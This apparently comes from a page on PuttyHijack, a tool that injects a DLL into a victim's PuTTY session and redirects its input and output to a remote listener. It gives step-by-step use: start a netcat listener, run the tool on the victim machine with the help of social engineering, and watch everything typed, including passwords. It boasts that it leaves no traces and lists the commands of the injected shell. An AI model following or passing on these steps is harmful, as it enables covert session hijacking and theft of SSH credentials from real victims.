The injected DLL installs hooks and creates a socket in guest operating system for a callback connection that is then used for input/output redirection.
PuttyHijack does not kill the current connection, and will cleanly uninject if the socket or process is stopped. Leaves no race for further analysis.
How to run/install PuttyHijack
- Start a nc listener on some fully controlled machine.
- Run PuttyHijack specify the listener ip and port on victime machine (Some socail engg skill may be helpfull)
- Watch the echoing of everything including passwords (grab it for further analysis)
- Help commands of PuttyHijack
!reco – reconnect it
!exit – just another way to exit the injected shell